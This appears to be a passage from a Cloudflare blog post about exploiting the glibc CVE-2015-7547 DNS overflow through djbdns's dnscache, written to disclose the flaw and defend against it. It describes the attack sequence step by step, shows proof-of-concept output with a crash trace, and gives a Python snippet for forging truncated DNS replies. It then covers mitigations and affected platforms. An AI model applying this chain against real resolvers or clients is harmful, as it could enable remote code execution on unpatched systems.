    <p>The key to a real world non-MitM cache resolver attack is to control the messages between the resolver and the client indirectly. We came to the conclusion that djbdns’ dnscache was the best target for attempting to illustrate an actual cache traversal.</p><p>In order to fend off DoS attack vectors like <a href="https://en.wikipedia.org/wiki/Slowloris_(computer_security)">slowloris</a>, which makes numerous simultaneous TCP connections and holds them open to clog up a service, DNS resolvers have a finite pool of parallel TCP connections. This is usually achieved by limiting these parallel TCP connections and closing the oldest or least-recently active one. For example, djbdns (dnscache) holds up to 20 parallel TCP connections, then starts dropping them, starting from the oldest one. Knowing this, we realised that we were able to terminate TCP connections with ease. Thus, one security fix becomes another bug’s treasure.</p><p>In order to exploit this, the attacker can send a truncated UDP A+AAAA query, which triggers the necessary retry over TCP. The attacker responds with a valid answer with a TTL of 0 and dnscache sends the glibc client a truncated UDP response. At this point, the glibc function <code>send_vc()</code> retries with dnscache over TCP and since the previous answer's TTL was 0, dnscache asks the attacker’s server for the A+AAAA query again. The attacker responds to the A query with an answer larger than 2000 bytes to induce glibc's buffer mismanagement, and dnscache then forwards it to the client. 
Now the attacker can either wait out the AAAA query while other clients are making perfectly legitimate requests or instead make 20 TCP connections back to dnscache, until dnscache terminates the attacker's connection.</p><p>Now that we’ve met all the conditions to trigger another retry, the attacker sends back any valid A response and a valid, oversized AAAA that carries the payload (either in CNAME or AAAA RDATA), dnscache tosses this back to the client, triggering the overflow.</p><p>It seems like a complicated process, but it really is not. Let’s have a look at our <a href="https://gist.github.com/vavrusa/689b48d2d6c16759fc85">proof-of-concept</a>:</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf
$ sudo python poc-dnscache.py
[TCP] Sending back first big answer with TTL=0
[TCP] Sending back second big answer with TTL=0
[TCP] Preparing the attack with an answer &gt;2k
[TCP] Connecting back to caller to force it close original connection('127.0.0.1', 53)
[TCP] Original connection was terminated, expecting to see requery...
[TCP] Sending back a valid answer in A
[TCP] Sending back attack payload in AAAA</code></pre>
            <p>Client:</p>
            <pre><code>$ valgrind curl https://www.cloudflare.com/
==6025== Process terminating with default action of signal 11 (SIGSEGV)
==6025==  General Protection Fault
==6025==    at 0x8617C55: __libc_res_nquery (res_query.c:264)
==6025==    by 0x861820F: __libc_res_nquerydomain (res_query.c:591)
==6025==    by 0x86187A8: __libc_res_nsearch (res_query.c:381)
==6025==    by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==6025==    by 0x1C000CC04D4D4D4C: ???
Killed</code></pre>
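            <p>For readers who want to poke at the first step themselves, the truncation trick that forces the TCP fallback can be sketched in a few lines of Python. This is an illustrative fragment, not part of the PoC above; <code>truncated_reply</code> is a name of our choosing:</p>

```python
import struct

def truncated_reply(query: bytes) -> bytes:
    # Echo the client's transaction ID so the stub accepts the reply.
    txid = query[:2]
    # Flags 0x8380: QR=1 (response), TC=1 (truncated), RD=1, RA=1.
    # The TC bit is what makes the client retry the query over TCP.
    flags = struct.pack(">H", 0x8380)
    # QDCOUNT=1, and no answer/authority/additional records.
    counts = struct.pack(">HHHH", 1, 0, 0, 0)
    # Copy the question section back verbatim after the 12-byte header.
    return txid + flags + counts + query[12:]
```

            <p>Sent as the UDP reply, this empty, truncated response is what pushes glibc's <code>send_vc()</code> onto the TCP code path that the rest of the attack abuses.</p>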
            <p>This PoC was made simply to illustrate that <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">remote code execution</a> through a DNS resolver's cache is not only possible, but may already be happening. So, patch. Now.</p><p>We reached out to <a href="https://www.opendns.com">OpenDNS</a>, knowing they had used djbdns as part of their codebase. They investigated and verified that this particular attack does not affect their resolvers.</p>
    <div>
      <h4>How accidental defenses saved the day</h4>
      <a href="#how-accidental-defenses-saved-the-day">
        
      </a>
    </div>
    <p>Dan Kaminsky wrote <a href="http://dankaminsky.com/2016/02/20/skeleton/">a thoughtful blog post</a> about scoping this issue. He argues:</p><blockquote><p>I’m just going to state outright: Nobody has gotten this glibc flaw to work through caches yet. So we just don’t know if that’s possible. Actual exploit chains are subject to what I call the MacGyver effect.</p></blockquote><p>Current resolvers scrub and sanitize final answers, so the attack payload must be encoded in a well-formed DNS answer to survive a pass through the resolver. In addition, only some record types are left intact: since the attack payload is carried in the AAAA query, only AAAA records in the answer section are safe from being scrubbed, forcing the attacker to encode the payload in those. One way to circumvent this limitation is to use a CNAME record, where the attack payload may be encoded in the CNAME target (a maximum of 255 octets).</p><p>The only good mitigation is to run a DNS resolver on <i>localhost</i>, where the attacker can't induce resource exhaustion, or at least to enforce a minimum cache TTL to defuse the waiting game.</p>
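    <p>To put numbers on that scrubbing constraint: an AAAA record carries only 16 bytes of RDATA, while a single domain name tops out at 255 octets, so filling glibc's 2048-byte buffer purely with AAAA records takes well over a hundred of them. A back-of-the-envelope sketch (the constants come from the DNS specification; the helper name is ours):</p>

```python
AAAA_RDATA_BYTES = 16    # an AAAA record's RDATA is one IPv6 address
CNAME_TARGET_MAX = 255   # a domain name may not exceed 255 octets

def aaaa_records_needed(payload_len: int) -> int:
    # Ceiling division: records required to carry payload_len bytes
    # when only AAAA RDATA survives the resolver's scrubbing.
    return -(-payload_len // AAAA_RDATA_BYTES)

# Overflowing the 2048-byte buffer purely via AAAA RDATA:
print(aaaa_records_needed(2048))  # 128
```

    <p>A 255-octet CNAME target is therefore roughly sixteen times denser than a single AAAA record, which is why it is the more convenient carrier for the payload.</p>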
    <div>
      <h3>Takeaway</h3>
      <a href="#takeaway">
        
      </a>
    </div>
    <p>You might think it's unlikely that you could become a MitM target, but the fact is that you <i>already are</i>. If you have ever used public Wi-Fi in an airport, a hotel or a café, you may have noticed being redirected to a captive portal for authentication. That is a temporary <a href="https://www.cloudflare.com/learning/security/global-dns-hijacking-threat/">DNS hijack</a> redirecting you to an internal portal until you agree to the terms and conditions. What's even worse is a permanent DNS interception that you don't notice until you inspect the actual answers. This happens on a daily basis, and a single name lookup is enough to trigger the flaw.</p><p>Neither DNSSEC nor independent public resolvers prevent it, as the attack happens between the stub and the recursor, on the <i>last mile</i>. The recent flaws highlight the fragility not only of legacy glibc code, but of stubs <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3484">in general</a>. DNS is a deceptively complicated protocol and should be treated carefully. A generally good mitigation is to shield yourself with a local caching DNS resolver<a href="#resolvers"><sup>1</sup></a>, or at least a <a href="https://dnscrypt.org">DNSCrypt</a> tunnel. Arguably, there might be a vulnerability in the resolver as well, but it would be contained to the daemon itself, not everything linked against the C library (e.g., sudo).</p>
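    <p>Checking which C library your system actually links against is straightforward, since glibc exports the <code>gnu_get_libc_version()</code> entry point. The following is a hedged sketch: the ctypes call is a real glibc API, while the <code>affected()</code> range check is our own helper based on the 2.9 to 2.22 window covered in the next section:</p>

```python
import ctypes
from typing import Optional

def glibc_version() -> Optional[str]:
    # gnu_get_libc_version() exists only in glibc; on musl, macOS or
    # the BSDs the symbol lookup fails, which already tells you the
    # vulnerable code path isn't there.
    try:
        libc = ctypes.CDLL(None)
        libc.gnu_get_libc_version.restype = ctypes.c_char_p
        return libc.gnu_get_libc_version().decode()
    except (OSError, AttributeError):
        return None

def affected(version: str) -> bool:
    # CVE-2015-7547 was introduced in glibc 2.9 and fixed in 2.23.
    major, minor = (int(p) for p in version.split(".")[:2])
    return (2, 9) <= (major, minor) <= (2, 22)
```
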
    <div>
      <h3>Are you affected?</h3>
      <a href="#are-you-affected">
        
      </a>
    </div>
    <p>If you're running GNU libc between 2.9 and 2.22, then yes. Below is an informative list of several major platforms affected.</p><table><thead><tr><th>Platform</th><th>Notice</th><th>Status</th></tr></thead><tbody><tr><td>Debian</td><td><a href="https://security-tracker.debian.org/tracker/CVE-2015-7547">CVE-2015-7547</a></td><td>Patched packages available (squeeze and newer)</td></tr><tr><td>Ubuntu</td><td><a href="http://www.ubuntu.com/usn/usn-2900-1/">USN-2900-1</a></td><td>Patched packages available (14.04 and newer)</td></tr><tr><td>RHEL</td><td><a href="https://access.redhat.com/articles/2161461">KB2161461</a></td><td>Patched packages available (RHEL 6-7)</td></tr><tr><td>SUSE</td><td><a href="https://www.suse.com/support/update/announcement/2016/suse-su-20160472-1.html">SUSE-SU-2016:0472-1</a></td><td>Patched packages available (latest)</td></tr><tr><td>Network devices &amp; CPEs</td><td><a href="https://www.reddit.com/r/networking/comments/46jfjf/cve20157547_mega_thread/">Updated list of affected platforms</a></td><td></td></tr></tbody></table><p>The toughest problem with this issue is the long tail of custom CPEs and IoT devices, which can't really be enumerated. Consult the manufacturer's website for vulnerability disclosures. Keep in mind that if your CPE is affected by remote code execution, its network can no longer be treated as safe.</p><p>If you're running OS X, iOS, Android or any BSD flavour<a href="#bsd-affected"><sup>2</sup></a>, you're not affected.</p><ul><li id="resolvers"><p>[1] Take a look at <a href="https://www.unbound.net">Unbound</a>, <a href="https://www.powerdns.com/recursor.html">PowerDNS Recursor</a> or <a href="https://www.knot-resolver.cz">Knot DNS Resolver</a> for a compliant validating resolver.</p></li><li id="bsd-affected"><p>[2] Applications running under Linux emulation and using glibc may be affected; make sure to update your ports.</p></li></ul><p></p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Programming]]></category>
            <guid isPermaLink="false">1lupmQh30nM3wtSJrCOh95</guid>
            <dc:creator>Marek Vavruša</dc:creator>
            <dc:creator>Jaime Cochran</dc:creator>
        </item>
    </channel>
</rss>